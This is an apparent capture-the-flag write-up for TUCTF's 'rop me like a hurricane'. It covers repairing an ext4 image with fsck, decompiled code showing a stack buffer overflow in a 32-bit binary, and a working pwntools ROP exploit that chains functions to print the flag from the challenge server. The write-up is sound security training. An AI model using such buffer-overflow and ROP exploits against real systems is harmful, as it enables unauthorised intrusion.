rop me like a hurricane

$ fsck.ext4 broken.img 
e2fsck 1.44.1 (24-Mar-2018)
Superblock has an invalid journal (inode 8).
Clear<y>? yes
*** journal has been deleted ***

Resize inode not valid.  Recreate<y>? yes
Pass 1: Checking inodes, blocks, and sizes
Root inode is not a directory.  Clear<y>? yes
Pass 2: Checking directory structure
Entry '..' in <2>/<65281> (65281) has deleted/unused inode 2.  Clear<y>? yes
Pass 3: Checking directory connectivity
Root inode not allocated.  Allocate<y>? yes
Unconnected directory inode 65281 (...)
Connect to /lost+found<y>? yes
/lost+found not found.  Create<y>? yes
Pass 4: Checking reference counts
Inode 65281 ref count is 3, should be 2.  Fix<y>? yes
Pass 5: Checking group summary information
Block bitmap differences:  +(1--263) +(278--279) +(294--803) +4376 +(8193--8995) +(10241--12288) -(139265--147456)
Fix<y>? yes
Free blocks count wrong for group #0 (3815, counted=3816).
Fix<y>? yes
Free blocks count wrong for group #17 (0, counted=8192).
Fix<y>? yes
Free blocks count wrong (447209, counted=455402).
Fix<y>? yes
Inode bitmap differences:  +1 +(3--10)
Fix<y>? yes
Recreate journal<y>? yes
Creating journal (8192 blocks):  Done.

*** journal has been regenerated ***

broken.img: ***** FILE SYSTEM WAS MODIFIED *****
broken.img: 197/122400 files (0.5% non-contiguous), 41070/488280 blocks
$ 
$ sudo mount -o loop -t ext4 broken.img mnt

$ file rop_me_like_a_hurricane 
rop_me_like_a_hurricane: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=a88febdd45196637e29afc6c5d2b19470e7dc020, for GNU/Linux 3.2.0, not stripped

ssize_t __usercall pwnme@<eax>(int a1@<ebp>)
{
  int v2; // [sp-1Ch] [bp-1Ch]@1
  int v3; // [sp-4h] [bp-4h]@1

  __asm { rep nop ebx }
  v3 = a1;
  sub_80490D0("You got this!\n> ");   // Puts
  return sub_80490C0(0, &v2, 0x40u);  // Read containing bufferoverflow 
}

char *A()
{
  char *result; // eax@1

  __asm { rep nop ebx }
  result = (char *)_x86_get_pc_thunk_ax() + 11678;
  if ( *(_DWORD *)&result[(_DWORD)(&c - 33632256)] )
  {
    if ( *(_DWORD *)&result[(_DWORD)(&b - 33632256)] )
      *(_DWORD *)&result[(_DWORD)(&a - 33632256)] = 1;
  }
  return result;
}
// 804C03C: using guessed type int a;
// 804C040: using guessed type int b;
// 804C044: using guessed type int c;

//----- (08049288) --------------------------------------------------------
char *B()
{
  char *result; // eax@1

  __asm { rep nop ebx }
  result = (char *)_x86_get_pc_thunk_ax() + 11628;
  *(_DWORD *)&result[(_DWORD)(&b - 33632256)] = 1;
  return result;
}
// 804C040: using guessed type int b;

//----- (080492A6) --------------------------------------------------------
char *C()
{
  char *result; // eax@1

  __asm { rep nop ebx }
  result = (char *)_x86_get_pc_thunk_ax() + 11598;
  if ( *(_DWORD *)&result[(_DWORD)(&b - 33632256)] )
    *(_DWORD *)&result[(_DWORD)(&c - 33632256)] = 1;
  return result;
}
// 804C040: using guessed type int b;
// 804C044: using guessed type int c;

//----- (080492CE) --------------------------------------------------------
int __usercall printFlag@<eax>(int a1@<ebp>)
{
  int v2; // [sp-14h] [bp-14h]@1
  void *v3; // [sp-10h] [bp-10h]@1
  int v4; // [sp-4h] [bp-4h]@1

  __asm { rep nop ebx }
  v4 = a1;
  v3 = sub_80490E0(0x40u);
  v2 = sub_8049100("./flag.txt", 0);
  if ( a && b && c )
  {
    sub_80490C0(v2, v3, 0x40u);
    sub_80490F0((const char *)v3);
  }
  return sub_8049130(v2);
}

$ ./exploit.py 
[+] Opening connection to chal.tuctf.com on port 31058: Done
 TUCTF{bu7_c4n_y0u_ROP_bl1ndf0ld3d?}

from pwn import *

s = remote('chal.tuctf.com', 31058)

funcA = 0x08049256
funcB = 0x08049288
funcC = 0x080492a6
funcFlag = 0x080492ce

buf  = "A"*28
buf += p32(funcB)
buf += p32(funcC)
buf += p32(funcA)
buf += p32(funcFlag)
buf += "\n"

s.sendafter(">" , buf)
print s.recvline()